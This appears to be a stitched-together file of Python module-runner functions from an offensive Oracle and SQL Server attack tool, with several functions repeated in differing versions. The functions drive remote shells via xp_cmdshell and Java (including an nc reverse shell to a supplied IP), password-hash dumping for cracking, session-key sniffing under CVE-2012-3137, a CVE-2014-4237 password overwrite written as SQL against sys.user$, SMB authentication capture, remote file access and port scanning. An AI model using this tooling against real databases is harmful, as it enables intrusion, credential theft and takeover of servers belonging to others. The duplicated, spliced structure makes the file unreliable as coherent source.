def runXpCmdShellModule(args): ''' Run the XpCmdShell module ''' noErrorWithEnableXpcmdshell = True if checkOptionsGivenByTheUser(args, [ "test-module", "shell", "enable-xpcmdshell", "disable-xpcmdshell", "put-file" ], checkAccount=True) == False: return EXIT_MISS_ARGUMENT xpcmdshell = Xpcmdshell(args) xpcmdshell.connect() if args["test-module"] == True: xpcmdshell.testAll() if args["put-file"] != None: args['print'].title( "Try to copy the local file {0} to {1} with powershell".format( args['put-file'][0], args['put-file'][1])) data = xpcmdshell.uploadFileWithPowershell(args['put-file'][0], args['put-file'][1], width=int( args['put-file'][2])) if data == True: args['print'].goodNews( "The local file {0} has been copied in {1}".format( args['put-file'][0], args['put-file'][1])) else: args['print'].badNews( "Impossible to put the local file {0} to {1}: '{2}'".format( args['put-file'][0], args['put-file'][1], data)) if args["enable-xpcmdshell"] == True: args['print'].title("Re-enable Xpcmdshell") noErrorWithEnableXpcmdshell = xpcmdshell.enableXpcmdshell() if noErrorWithEnableXpcmdshell == True: args['print'].goodNews("Xpcmdshell is re-enabled") else: args['print'].badNews("Xpcmdshell is NOT re-enabled") if args["shell"] == True: args['print'].title("Trying to get a shell thanks to xpcmdshell") status = xpcmdshell.getInteractiveShell() if status == True: args['print'].goodNews("Good Bye :)") else: args['print'].badNews("Impossible to get a shell on the database") if args["disable-xpcmdshell"] == True: if noErrorWithEnableXpcmdshell == True: args['print'].title("Disable Xpcmdshell") status = xpcmdshell.disableXpcmdshell() if status == True: args['print'].goodNews("Xpcmdshell is disabled") else: args['print'].badNews( "Xpcmdshell is NOT disabled: {0}".format(status)) xpcmdshell.closeConnection()
def runCVE20123137Module(args): ''' Run the CVE_2012_3137 module ''' if checkOptionsGivenByTheUser( args, ["test-module", "get-all-passwords", "decrypt-sessions"], checkAccount=False) == False: return EXIT_MISS_ARGUMENT cve = CVE_2012_3137(args, accountsFile=args['user-list'], timeSleep=args['timeSleep']) if args['test-module'] == True: cve.testAll() #Option 1: get all passwords if args['get-all-passwords'] != None: print if geteuid() != 0: args['print'].badNews( "Sorry, you need to run this as root because I need to sniff authentications to the database" ) else: args['print'].title( "Getting remote passwords on the {0} server, port {1}".format( args['server'], args['port'])) cve.getPasswords() keys = cve.getKeys() if keys != []: args['print'].goodNews("Here are keys:\n\n{0}".format( '\n'.join(keys))) filename = "sessions-{0}-{1}-{2}{3}".format( args['server'], args['port'], args['sid'], CHALLENGE_EXT_FILE) f = open(filename, "w") f.write('\n'.join(keys)) f.close() args['print'].goodNews( "Sessions strored in the {0} file.".format(filename)) else: args['print'].badNews( "Impossible to exploit this vulnreability") #Option 2: decrypt sessions if args['decrypt-sessions'] != None: args['print'].title("Decrypt sessions stored in {0} via {1}".format( args['decrypt-sessions'][0], args['decrypt-sessions'][1])) passwds = cve.decryptKeys(args['decrypt-sessions'][0], args['decrypt-sessions'][1]) if passwds != []: passwordsStr = "" for e in passwds: passwordsStr += '{0}:{1}\n'.format(e[0], e[1]) args['print'].goodNews("Accounts found:\n{0}".format(passwordsStr)) else: args['print'].badNews("No password has been found")
def runXpDirectoryModule(args): ''' Run the XpDirectory module ''' if checkOptionsGivenByTheUser(args,['list-files','list-dir','list-fixed-drives','list-available-media','file-exists','create-dir'],checkAccount=True) == False : return EXIT_MISS_ARGUMENT xpDirectory = XpDirectory(args) xpDirectory.connect() if args["test-module"] == True: xpDirectory.testAll() if args["list-files"] != None: args['print'].title("Try to list files stored in {0}".format(args["list-files"][0])) data= xpDirectory.listFilesViaXpDirtree(args["list-files"][0]) if isinstance(data,Exception): args['print'].badNews("Impossible to list files stored in {0}: {1}".format(args["list-files"][0],data)) else: args['print'].goodNews("Files stored in {0}:\n{1}".format(args["list-files"][0],data)) if args["list-dir"] != None: args['print'].title("Try to list directories stored in {0}".format(args["list-dir"][0])) data= xpDirectory.listDirectoriesViaXpSubdirs(args["list-dir"][0]) if isinstance(data,Exception): args['print'].badNews("Impossible to list files stored in {0}: {1}".format(args["list-dir"][0],data)) else: args['print'].goodNews("Files stored in {0}:\n{1}".format(args["list-dir"][0],data)) if args["list-fixed-drives"] == True: args['print'].title("Try to list drives with xp_subdirs") data= xpDirectory.listDrivesViaXpFixedDrives() if isinstance(data,Exception): args['print'].badNews("Impossible to list drives with xp_subdirs: {1}".format(data)) else: args['print'].goodNews("Drives:\n{0}".format(data)) if args["list-available-media"] == True: args['print'].title("Try to list medias with xp_availablemedia") data= xpDirectory.listDrivesViaXpAvailableMedia() if isinstance(data,Exception): args['print'].badNews("Impossible to list drives with xp_availablemedia: {1}".format(data)) else: args['print'].goodNews("Medias:\n{0}".format(data)) if args["file-exists"] != None: args['print'].title("Try to check if the file {0} exists".format(args["file-exists"][0])) data= xpDirectory.isFileExistViaXpFileexist(args["file-exists"][0]) if isinstance(data,Exception): args['print'].badNews("Impossible to know if the file {0} exists: {1}".format(args["file-exists"][0],data)) else: args['print'].goodNews("{1}".format(args["file-exists"][0],data)) if args["create-dir"] != None: args['print'].title("Try to create the folder {0}".format(args["create-dir"][0])) data= xpDirectory.createSubDiViaXpCreateSubdir(args["create-dir"][0]) if isinstance(data,Exception): args['print'].badNews("Impossible to create the folder {0}: {1}".format(args["create-dir"][0],data)) else: args['print'].goodNews("The folder {0} has been created".format(args["create-dir"][0])) xpDirectory.closeConnection()
def runCVE20123137Module(args): """ Run the CVE_2012_3137 module """ if ( checkOptionsGivenByTheUser(args, ["test-module", "get-all-passwords", "decrypt-sessions"], checkAccount=False) == False ): return EXIT_MISS_ARGUMENT cve = CVE_2012_3137(args, accountsFile=args["user-list"], timeSleep=args["timeSleep"]) if args["test-module"] == True: cve.testAll() # Option 1: get all passwords if args["get-all-passwords"] != None: print if geteuid() != 0: args["print"].badNews( "Sorry, you need to run this as root because I need to sniff authentications to the database" ) else: args["print"].title( "Getting remote passwords on the {0} server, port {1}".format(args["server"], args["port"]) ) cve.getPasswords() keys = cve.getKeys() if keys != []: args["print"].goodNews("Here are keys:\n\n{0}".format("\n".join(keys))) filename = "sessions-{0}-{1}-{2}{3}".format( args["server"], args["port"], args["sid"], CHALLENGE_EXT_FILE ) f = open(filename, "w") f.write("\n".join(keys)) f.close() args["print"].goodNews("Sessions strored in the {0} file.".format(filename)) else: args["print"].badNews("Impossible to exploit this vulnreability") # Option 2: decrypt sessions if args["decrypt-sessions"] != None: args["print"].title( "Decrypt sessions stored in {0} via {1}".format(args["decrypt-sessions"][0], args["decrypt-sessions"][1]) ) passwds = cve.decryptKeys(args["decrypt-sessions"][0], args["decrypt-sessions"][1]) if passwds != []: passwordsStr = "" for e in passwds: passwordsStr += "{0}:{1}\n".format(e[0], e[1]) args["print"].goodNews("Accounts found:\n{0}".format(passwordsStr)) else: args["print"].badNews("No password has been found")
def runPasswordGuesserModule(args): ''' Run the PasswordGuesser module ''' if checkOptionsGivenByTheUser(args,["search"],checkAccount=False, allowHostsFile=True) == False : return EXIT_MISS_ARGUMENT if args['hostlist'] != None: hosts = getHostsFromFile(args['hostlist']) args['print'].title("Searching valid accounts on these targets: {0}".format(hosts)) for aHost in hosts: args['host'], args['port'] = aHost[0], aHost[1] args['print'].subtitle("Searching valid accounts on the {0} server, port {1}".format(args['host'], args['port'])) runPasswordGuesserModuleOnAHost(args) else: args['print'].title("Searching valid accounts on the {0} server, port {1}".format(args['host'], args['port'])) runPasswordGuesserModuleOnAHost(args)
def runHttpUriTypeModule(args): """ Run the HTTPURITYPE module """ status = True if checkOptionsGivenByTheUser(args, ["test-module", "httpUrl", "scan-ports"]) == False: return EXIT_MISS_ARGUMENT httpUriType = HttpUriType(args) status = httpUriType.connection(stopIfError=True) if args["test-module"] == True: args["print"].title("Test if the HTTPURITYPE library can be used") status = httpUriType.testAll() # Option 1: httpUrl if args["httpUrl"] != None: args["print"].title("Send a GET request from {0} to {1}".format(args["connectionStr"], args["httpUrl"])) response = httpUriType.sendGetRequest(url=args["httpUrl"]) if isinstance(response, Exception): args["print"].badNews("HTTP GET request failed") else: args["print"].goodNews("The server response is:\n {0}".format(response)) if args["outputFile"] != None: httpUriType.writeFile(args["outputFile"], str(response)) # Option 2: scan-ports if args["scan-ports"] != None: ports = [] if "," in args["scan-ports"][1]: ports = args["scan-ports"][1].split(",") elif "-" in args["scan-ports"][1]: startEnd = args["scan-ports"][1].split("-") for aPort in range(int(startEnd[0]), int(startEnd[1])): ports.append(str(aPort)) if ports == []: logging.critical( "The second parameter ('{0}') is not a valid: cancelation...".format(args["scan-ports"][1]) ) return -1 else: if args["scan-ports"][1].isdigit() == True: ports = [args["scan-ports"][1]] else: logging.critical( "The second parameter ('{0}') is not a valid port: cancelation...".format(args["scan-ports"][1]) ) return -1 args["print"].title("Scan ports ({0}) of {1} ".format(args["scan-ports"][1], args["scan-ports"][0])) resultats = httpUriType.scanTcpPorts(httpObject=httpUriType, ip=args["scan-ports"][0], ports=ports) httpUriType.printScanPortResults(resultats) httpUriType.close()
def runPasswordsModule(args): ''' Run the Passwords module ''' status = True if checkOptionsGivenByTheUser(args,["test-module","get-passwords","get-passwords-from-history", "get-passwords-not-locked"]) == False : return EXIT_MISS_ARGUMENT passwords = Passwords(args) status = passwords.connection(stopIfError=True) passwords.__getLockedUsernames__() if args.has_key('info')==False: info = Info(args) info.loadInformationRemoteDatabase() args['info'] = info if args['test-module'] == True : args['print'].title("Test if hashed passwords can be got") status = passwords.testAll() if args['get-passwords'] == True : args['print'].title("Try to get Oracle hashed passwords") status = passwords.__tryToGetHashedPasswords__() if status == True : args['print'].goodNews("Here are Oracle hashed passwords (some accounts can be locked):") passwords.printPasswords() args['print'].goodNews("Here are 10g Oracle hashed passwords for oclHashcat (some accounts can be locked):") passwords.printPasswordsOclHashcat() else : args['print'].badNews("Impossible to get hashed passwords: {0}".format(status)) if args['get-passwords-not-locked'] == True : args['print'].title("Try to get Oracle hashed passwords when the account is not locked") blacklistOfUsernames = passwords.__getLockedUsernames__() status = passwords.__tryToGetHashedPasswords__(blacklistOfUsernames) if status == True : args['print'].goodNews("Here are Oracle hashed passwords (all accounts are opened, not locked):") passwords.printPasswords() args['print'].goodNews("Here are 10g Oracle hashed passwords for oclHashcat (all accounts are opened, not locked):") passwords.printPasswordsOclHashcat() else : args['print'].badNews("Impossible to get hashed passwords: {0}".format(status)) if args['get-passwords-from-history'] == True : args['print'].title("Try to get Oracle hashed passwords from history") status = passwords.__tryToGetHashedPasswordsfromHistory__() if status == True : args['print'].goodNews("Here are Oracle hashed passwords:") passwords.printPasswords() else : args['print'].badNews("Impossible to get hashed passwords from history: {0}".format(status))
def runMssqlInfoModule(args): ''' ''' if checkOptionsGivenByTheUser(args,["get-max-info"],checkAccount=False) == False : return EXIT_MISS_ARGUMENT if args['get-max-info'] == True: mssqlInfo = MssqlInfo(args) productName = mssqlInfo.__getRemoteVersionThroughTDSResponse__() args['print'].title("Try to get the remote database version thanks to the TDS protocol:") if productName.has_key('Version') == True and productName.has_key('ProductName') == True: args['print'].goodNews("The SQL server version of {0}:{1}: {2} i.e. {3}".format(args['host'],args['port'], productName['Version'],productName['ProductName'])) else : args['print'].badNews("Impossible to get the remote database version thanks to the TDS protocol") args['print'].title("Try to get information about the remote database thanks to SQL browser Server:") info = mssqlInfo.__getRemoteVersionThroughSQLServerBrowser__() if info == {}: args['print'].badNews("SQL Server Browser is not enabled on the server {0}:{1}".format(args['host'], args['port'])) else : args['print'].goodNews("SQL Server Browser is enabled on the server {0}:{1}:\n{2}".format(args['host'], args['port'], mssqlInfo.returnPrintableStringFromDict(info)))
def runTnsCmdModule(args): ''' run the TNS cmd module ''' if checkOptionsGivenByTheUser(args,["version","status","ping"],checkSID=False,checkAccount=False) == False : return EXIT_MISS_ARGUMENT tnscmd = Tnscmd(args) if args['ping'] == True: args['print'].title("Searching ALIAS on the {0} server, port {1}".format(args['server'],args['port'])) alias = tnscmd.getAlias() args['print'].goodNews("{0} ALIAS received: {1}. You should use this alias (more or less) as Oracle SID.".format(len(alias),alias)) if args['version'] == True: args['print'].title("Searching the version of the Oracle database server ({0}) listening on the port {1}".format(args['server'],args['port'])) version = tnscmd.getVersion() args['print'].goodNews("The remote database version is: '{0}'".format(version)) if args['status'] == True: args['print'].title("Searching the server status of the Oracle database server ({0}) listening on the port {1}".format(args['server'],args['port'])) tnscmd.getInformation(cmd='status') args['print'].goodNews("Data received by the database server: '{0}'".format(tnscmd.getRecvData()))
def runSMBModule(args): ''' ''' status = True if checkOptionsGivenByTheUser(args,["test-module",'captureSMBAuthentication']) == False : return EXIT_MISS_ARGUMENT smb = SMB(args) status = smb.connection(stopIfError=True) if args['test-module'] == True : args['print'].title("Test if SMB authentication capture can be possible") status = smb.testAll() #Option 1: capture SMB authentication if args['captureSMBAuthentication'] !=None : args['print'].title("Try to capture the SMB authentication (Connection to \\\\{0}\\{1} )".format(args['captureSMBAuthentication'][0],args['captureSMBAuthentication'][1])) status = smb.captureSMBAuthentication(args['captureSMBAuthentication'][0],args['captureSMBAuthentication'][1]) if isinstance(status,Exception): args['print'].badNews("Impossible to capture the SMB authentication") else : args['print'].goodNews("Check your SMB capture tool ...")
def runUtlTcpModule(args): ''' Run the UTL_TCP module ''' status = True if checkOptionsGivenByTheUser( args, ["test-module", "send-packet", "scan-ports"]) == False: return EXIT_MISS_ARGUMENT utlTcp = UtlTcp(args) status = utlTcp.connection(stopIfError=True) if args['test-module'] == True: args['print'].title("Test if the UTL_TCP library can be used") status = utlTcp.testAll() #Option 2: send packet if args['send-packet'] != None: args['print'].title("Send the packet stored in the {0} file".format( args['send-packet'][2])) data = utlTcp.sendPacket(args['send-packet'][0], args['send-packet'][1], filename=args['send-packet'][2]) if isinstance(data, Exception): args['print'].badNews( "Impossible to send the packet: {0}".format(data)) else: args['print'].goodNews( "Response from the server:\n{0}".format(data)) #Option 1: tcp Scan if args['scan-ports'] != None: ports = [] if "," in args['scan-ports'][1]: ports = args['scan-ports'][1].split(',') elif '-' in args['scan-ports'][1]: startEnd = args['scan-ports'][1].split('-') for aPort in range(int(startEnd[0]), int(startEnd[1])): ports.append(str(aPort)) else: logging.error("Syntax for ports given not recognized") args['print'].title("Scan ports ({0}) of {1} ".format( args['scan-ports'][1], args['scan-ports'][0])) resultats = utlTcp.scanTcpPorts(httpObject=utlTcp, ip=args['scan-ports'][0], ports=ports) utlTcp.printScanPortResults(resultats) utlTcp.close()
def runOradbgModule(args): ''' Run the Oradbg module ''' status = True if checkOptionsGivenByTheUser(args,["test-module","exec"]) == False : return EXIT_MISS_ARGUMENT oradbg = Oradbg(args) status = oradbg.connection(stopIfError=True) if args['test-module'] == True : args['print'].title("Test if the Oradbg can be used") status = oradbg.testAll() #Option 1: exec if args['exec'] != None: args['print'].title("Execute the `{0}` on the {1} server".format(args['exec'],args['server'])) status = oradbg.execOSCommand(args['exec']) if status == True: args['print'].goodNews("The `{0}` command was executed on the {1} server (probably)".format(args['exec'],args['server'])) else : args['print'].badNews("The `{0}` command was not executed on the {1} server: {2}".format(args['exec'],args['server'],str(status))) oradbg.close()
def runCVEXXXYYYModule(args): ''' Run the CVE_XXXX_YYYY module ''' if checkOptionsGivenByTheUser(args, ["test-module", "set-pwd-2014-4237"], checkAccount=False) == False: return EXIT_MISS_ARGUMENT cve = CVE_XXXX_YYYY(args) status = cve.connection(stopIfError=True) if args['test-module'] == True: cve.testAll() if args['set-pwd-2014-4237'] != None: hash11g = oracle11.encrypt(args['set-pwd-2014-4237'][1]) hash10g = oracle10.encrypt(args['set-pwd-2014-4237'][1], user=args['set-pwd-2014-4237'][0]) logging.info("hash11g('{2}')={0} & hash10g('{2}')={1}".format( hash11g, hash10g, args['set-pwd-2014-4237'][0])) REQ_ALTER_AUDIT_ACTIONS_WITH_VIEW_FOR_CVE_2014_4237 = "update (with tmp as (select * from sys.user$) select * from tmp) set password='******', SPARE4='{2}' where name='{0}'".format( args['set-pwd-2014-4237'][0], hash10g, hash11g) REQ_ALTER_AUDIT_ACTIONS_FOR_CVE_2014_4237 = "update sys.user$ set password='******', SPARE4='{2}' where name='{0}'".format( args['set-pwd-2014-4237'][0], hash10g, hash11g) args['print'].title( "Modify password of '{0}' by these hashs '{1}' & '{2}' using CVE-2014-4237" .format(args['set-pwd-2014-4237'][0], hash10g, hash11g)) status = cve.exploit_CVE_2014_4237( updateRequestNormal=REQ_ALTER_AUDIT_ACTIONS_FOR_CVE_2014_4237, updateRequestWithView= REQ_ALTER_AUDIT_ACTIONS_WITH_VIEW_FOR_CVE_2014_4237) if status == True: cve.args['print'].goodNews( "The password of '{0}' has been replaced by '{1}' by exploiting CVE-2014-4237. DB restart necessary!" .format(args['set-pwd-2014-4237'][0], args['set-pwd-2014-4237'][1])) elif status == False: cve.args['print'].badNews( "The password of '{0}' has NOT been replaced".format( args['set-pwd-2014-4237'][0])) elif status == None: cve.args['print'].goodNews( "The password of '{0}' has been replaced. This CVE has not be used to do that (if it impacts this database). DB restart necessary!" .format(args['set-pwd-2014-4237'][0]))
def runDbmsLob (args): ''' Run the DbmsLob module ''' status = True if checkOptionsGivenByTheUser(args,["test-module","getFile"]) == False : return EXIT_MISS_ARGUMENT dbmsLob = DbmsLob(args) status = dbmsLob.connection(stopIfError=True) if args['test-module'] == True : args['print'].title("Test if the DbmsLob module can be used") status = dbmsLob.testAll() #Option 1: getFile if args['getFile'] != None: args['print'].title("Read the {0} file stored in the {1} path".format(args['getFile'][1],args['getFile'][0])) data = dbmsLob.getFile (remotePath=args['getFile'][0], remoteNameFile=args['getFile'][1], localFile=args['getFile'][2]) if isinstance(data,Exception): args['print'].badNews("There is an error: {0}".format(data)) elif data == False : args['print'].badNews("The {0} file in {1} doesn't exist".format(args['getFile'][1],args['getFile'][0])) elif data == '' : args['print'].badNews("The {0} file is empty".format(args['getFile'])) else : args['print'].goodNews("Data stored in the {0} file sored in {1} (copied in {2} locally):\n{3}".format(args['getFile'][1],args['getFile'][0],args['getFile'][2],data))
def runUtlFileModule(args): ''' ''' status = True if checkOptionsGivenByTheUser(args,["test-module","getFile",'putFile','removeFile']) == False : return EXIT_MISS_ARGUMENT utlFile = UtlFile(args) status = utlFile.connection(stopIfError=True) if args['test-module'] == True : args['print'].title("Test if the UTL_FILE library can be used") status = utlFile.testAll() #Option 1: read file if args['getFile'] !=None : args['print'].title("Read the {0} file stored in {1} on the {2} server".format(args['getFile'][1],args['getFile'][0],args['server'])) #fileExist = utlFile.getFileExist(args['getFile'][0], args['getFile'][1]) length = utlFile.getLength(args['getFile'][0], args['getFile'][1]) data = utlFile.getFile(args['getFile'][0], args['getFile'][1]) if isinstance(data,Exception): args['print'].badNews("Impossible to read the {0} file: {1}".format(args['getFile'],data)) else : if data == False : args['print'].badNews("The {0} file in {1} doesn't exist".format(args['getFile'][1],args['getFile'][0])) elif data == '' : args['print'].badNews("The {0} file is empty".format(args['getFile'])) else : args['print'].goodNews("Data stored in the {0} file sored in {1} (copied in {2} locally):\n{3}".format(args['getFile'][1],args['getFile'][0],args['getFile'][2],data)) utlFile.writeFile(args['getFile'][2],data) #Option 2: put file if args['putFile'] !=None : args['print'].title("Put the {0} local file in the {1} folder like {2} on the {3} server".format(args['putFile'][2],args['putFile'][0],args['putFile'][1],args['server'])) status = utlFile.putFile(args['putFile'][0], args['putFile'][1], localFile=args['putFile'][2]) if isinstance(status,Exception): args['print'].badNews("Impossible to put the {0} file: {1}".format(args['putFile'][2],status)) else : args['print'].goodNews("The {0} file was created on the {1} directory on the {2} server like the {3} file".format(args['putFile'][2], args['putFile'][0], args['server'],args['putFile'][1])) #Option 3: remove file if args['removeFile'] !=None : args['print'].title("Remove the {0} file stored in the {1} folder on the {2} server".format(args['removeFile'][1],args['removeFile'][0],args['server'])) status = utlFile.deleteFile(args['removeFile'][0], args['removeFile'][1]) if isinstance(status,Exception): args['print'].badNews("Impossible to remove the {0} file: {1}".format(args['removeFile'][1],status )) else : args['print'].goodNews("The {0} file was deleted on the {1} directory on the {2} server".format(args['removeFile'][1], args['removeFile'][0], args['server']))
def runUtlHttpModule(args): ''' Run the UTL_HTTP module ''' status = True if checkOptionsGivenByTheUser(args,["test-module","scan-ports","send"]) == False : return EXIT_MISS_ARGUMENT utlHttp = UtlHttp(args) status = utlHttp.connection(stopIfError=True) utlHttp.setTimeout(5) if args['test-module'] == True : args['print'].title("Test if the UTL_HTTP library can be used") status = utlHttp.testAll() #Option 1: sendRequest if args['send'] != None: args['print'].title("Send the HTTP request stored in the {0} file".format(args['send'][2])) data = utlHttp.sendRequest(args['send'][0],args['send'][1],args['send'][2]) if isinstance(data,Exception): args['print'].badNews("Impossible to send the request: {0}".format(data)) else : args['print'].goodNews("Response from the server:\n{0}".format(data)) #Option 2: scan-ports if args['scan-ports'] != None: ports = [] if "," in args['scan-ports'][1]: ports=args['scan-ports'][1].split(',') elif '-' in args['scan-ports'][1]: startEnd = args['scan-ports'][1].split('-') for aPort in range(int(startEnd[0]),int(startEnd[1])): ports.append(str(aPort)) if ports == []: logging.critical("The second parameter ('{0}') is not a valid: cancelation...".format(args['scan-ports'][1])) return -1 elif args['scan-ports'][1].isdigit() == True: ports = [args['scan-ports'][1]] else: logging.critical("The second parameter ('{0}') is not a valid port: cancelation...".format(args['scan-ports'][1])) return -1 args['print'].title("Scan ports ({0}) of {1} ".format(args['scan-ports'][1],args['scan-ports'][0])) resultats = utlHttp.scanTcpPorts(httpObject=utlHttp,ip=args['scan-ports'][0],ports=ports) utlHttp.printScanPortResults(resultats) utlHttp.close()
def runCVEXXXYYYModule(args): ''' Run the CVE_XXXX_YYYY module ''' if checkOptionsGivenByTheUser(args,["test-module","set-pwd-2014-4237"],checkAccount=False) == False : return EXIT_MISS_ARGUMENT cve = CVE_XXXX_YYYY(args) status = cve.connection(stopIfError=True) if args['test-module'] == True : cve.testAll() if args['set-pwd-2014-4237'] != None : hash11g = oracle11.encrypt(args['set-pwd-2014-4237'][1]) hash10g = oracle10.encrypt(args['set-pwd-2014-4237'][1], user=args['set-pwd-2014-4237'][0]) logging.info("hash11g('{2}')={0} & hash10g('{2}')={1}".format(hash11g, hash10g, args['set-pwd-2014-4237'][0])) REQ_ALTER_AUDIT_ACTIONS_WITH_VIEW_FOR_CVE_2014_4237 = "update (with tmp as (select * from sys.user$) select * from tmp) set password='******', SPARE4='{2}' where name='{0}'".format(args['set-pwd-2014-4237'][0], hash10g, hash11g) REQ_ALTER_AUDIT_ACTIONS_FOR_CVE_2014_4237 = "update sys.user$ set password='******', SPARE4='{2}' where name='{0}'".format(args['set-pwd-2014-4237'][0], hash10g, hash11g) args['print'].title("Modify password of '{0}' by these hashs '{1}' & '{2}' using CVE-2014-4237".format(args['set-pwd-2014-4237'][0],hash10g, hash11g)) status = cve.exploit_CVE_2014_4237(updateRequestNormal=REQ_ALTER_AUDIT_ACTIONS_FOR_CVE_2014_4237, updateRequestWithView=REQ_ALTER_AUDIT_ACTIONS_WITH_VIEW_FOR_CVE_2014_4237) if status == True: cve.args['print'].goodNews("The password of '{0}' has been replaced by '{1}' by exploiting CVE-2014-4237. DB restart necessary!".format(args['set-pwd-2014-4237'][0],args['set-pwd-2014-4237'][1])) elif status == False: cve.args['print'].badNews("The password of '{0}' has NOT been replaced".format(args['set-pwd-2014-4237'][0])) elif status == None: cve.args['print'].goodNews("The password of '{0}' has been replaced. This CVE has not be used to do that (if it impacts this database). DB restart necessary!".format(args['set-pwd-2014-4237'][0]))
def runCVE20123137Module(args): ''' Run the CVE_2012_3137 module ''' if checkOptionsGivenByTheUser(args,["test-module","get-all-passwords","decrypt-sessions"],checkAccount=False) == False : return EXIT_MISS_ARGUMENT cve = CVE_2012_3137 (args, accountsFile=args['user-list'], timeSleep=args['timeSleep']) if args['test-module'] == True : cve.testAll() #Option 1: get all passwords if args['get-all-passwords'] != None: print if geteuid() != 0: args['print'].badNews("Sorry, you need to run this as root because I need to sniff authentications to the database") else: args['print'].title("Getting remote passwords on the {0} server, port {1}".format(args['server'],args['port'])) cve.getPasswords() keys = cve.getKeys() if keys != []: args['print'].goodNews("Here are keys:\n\n{0}\n\nIf for some users keys are empty, there was an error during capture or this Oracle user does not exist on the database".format('\n'.join(keys))) filename = "sessions-{0}-{1}-{2}{3}".format(args['server'],args['port'],args['sid'],CHALLENGE_EXT_FILE) f = open(filename,"w") f.write('\n'.join(keys)) f.close() args['print'].goodNews("Sessions strored in the {0} file.".format(filename)) else : args['print'].badNews("Impossible to exploit this vulnreability") #Option 2: decrypt sessions if args['decrypt-sessions'] != None: args['print'].title("Decrypt sessions stored in {0} via {1}".format(args['decrypt-sessions'][0],args['decrypt-sessions'][1])) passwds = cve.decryptKeys(args['decrypt-sessions'][0], args['decrypt-sessions'][1]) if passwds != []: passwordsStr = "" for e in passwds : passwordsStr +='{0}:{1}\n'.format(e[0],e[1]) args['print'].goodNews("Accounts found:\n{0}".format(passwordsStr)) else: args['print'].badNews("No password has been found")
def runXpCmdShellModule(args): ''' Run the XpCmdShell module ''' noErrorWithEnableXpcmdshell = True if checkOptionsGivenByTheUser( args, ["test-module", "shell", "enable-xpcmdshell", "disable-xpcmdshell"], checkAccount=True) == False: return EXIT_MISS_ARGUMENT xpcmdshell = Xpcmdshell(args) xpcmdshell.connect() if args["test-module"] == True: xpcmdshell.testAll() if args["enable-xpcmdshell"] == True: args['print'].title("Re-enable Xpcmdshell") noErrorWithEnableXpcmdshell = xpcmdshell.enableXpcmdshell() if noErrorWithEnableXpcmdshell == True: args['print'].goodNews("Xpcmdshell is re-enabled") else: args['print'].badNews("Xpcmdshell is NOT re-enabled") if args["shell"] == True: args['print'].title("Trying to get a shell thanks to xpcmdshell") status = xpcmdshell.getInteractiveShell() if status == True: args['print'].goodNews("Good Bye :)") else: args['print'].badNews("Impossible to get a shell on the database") if args["disable-xpcmdshell"] == True: if noErrorWithEnableXpcmdshell == True: args['print'].title("Disable Xpcmdshell") status = xpcmdshell.disableXpcmdshell() if status == True: args['print'].goodNews("Xpcmdshell is disabled") else: args['print'].badNews( "Xpcmdshell is NOT disabled: {0}".format(status)) xpcmdshell.closeConnection()
def runjavaModule(args): ''' Run the JAVA module ''' status = True if checkOptionsGivenByTheUser(args,["test-module","shell","reverse-shell"]) == False : return EXIT_MISS_ARGUMENT java = Java(args) status = java.connection(stopIfError=True) if args['test-module'] == True : args['print'].title("Test if the DBMSScheduler library can be used") status = java.testAll() #Option 1: exec if args['exec'] != None: args['print'].title("Execute the `{0}` on the {1} server".format(args['exec'],args['server'])) status = java.execOSCommand(cmd=args['exec'],printResponse=True, needCreateClassAndFunction = True, needDeleteClassAndFunction = True) #Option 2: shell if args['shell'] == True: args['print'].title("Try to give you a pseudo shell to the {0} server".format(args['server'])) java.getInteractiveShell() #Option 3: reverse shell if args['reverse-shell'] != None : args['print'].title("Try to give you a nc reverse shell from the {0} server".format(args['server'])) java.giveReverseShell(localip=args['reverse-shell'][0],localport=args['reverse-shell'][1]) java.close()
def runPasswordsModule(args): ''' Run the Passwords module ''' status = True if checkOptionsGivenByTheUser(args, [ "test-module", "get-passwords", "get-passwords-from-history", "get-passwords-not-locked" ]) == False: return EXIT_MISS_ARGUMENT passwords = Passwords(args) status = passwords.connection(stopIfError=True) passwords.__getLockedUsernames__() if args.has_key('info') == False: info = Info(args) info.loadInformationRemoteDatabase() args['info'] = info if args['test-module'] == True: args['print'].title("Test if hashed passwords can be got") status = passwords.testAll() if args['get-passwords'] == True: args['print'].title("Try to get Oracle hashed passwords") status = passwords.__tryToGetHashedPasswords__() if status == True: args['print'].goodNews( "Here are Oracle hashed passwords (some accounts can be locked):" ) passwords.printPasswords() args['print'].goodNews( "Here are 10g Oracle hashed passwords for oclHashcat (some accounts can be locked):" ) passwords.printPasswordsOclHashcat() args['print'].goodNews( "Here are 10g Oracle hashed passwords for John the Ripper (some accounts can be locked):" ) passwords.printPasswordsJohn() else: args['print'].badNews( "Impossible to get hashed passwords: {0}".format(status)) if args['get-passwords-not-locked'] == True: args['print'].title( "Try to get Oracle hashed passwords when the account is not locked" ) blacklistOfUsernames = passwords.__getLockedUsernames__() status = passwords.__tryToGetHashedPasswords__(blacklistOfUsernames) if status == True: args['print'].goodNews( "Here are Oracle hashed passwords (all accounts are opened, not locked):" ) passwords.printPasswords() args['print'].goodNews( "Here are 10g Oracle hashed passwords for oclHashcat (all accounts are opened, not locked):" ) passwords.printPasswordsOclHashcat() args['print'].goodNews( "Here are 10g Oracle hashed passwords for John the Ripper (all accounts are opened, not locked):" ) passwords.printPasswordsJohn() else: args['print'].badNews( "Impossible to get hashed passwords: {0}".format(status)) if args['get-passwords-from-history'] == True: args['print'].title("Try to get Oracle hashed passwords from history") status = passwords.__tryToGetHashedPasswordsfromHistory__() if status == True: args['print'].goodNews("Here are Oracle hashed passwords:") passwords.printPasswords() else: args['print'].badNews( "Impossible to get hashed passwords from history: {0}".format( status))
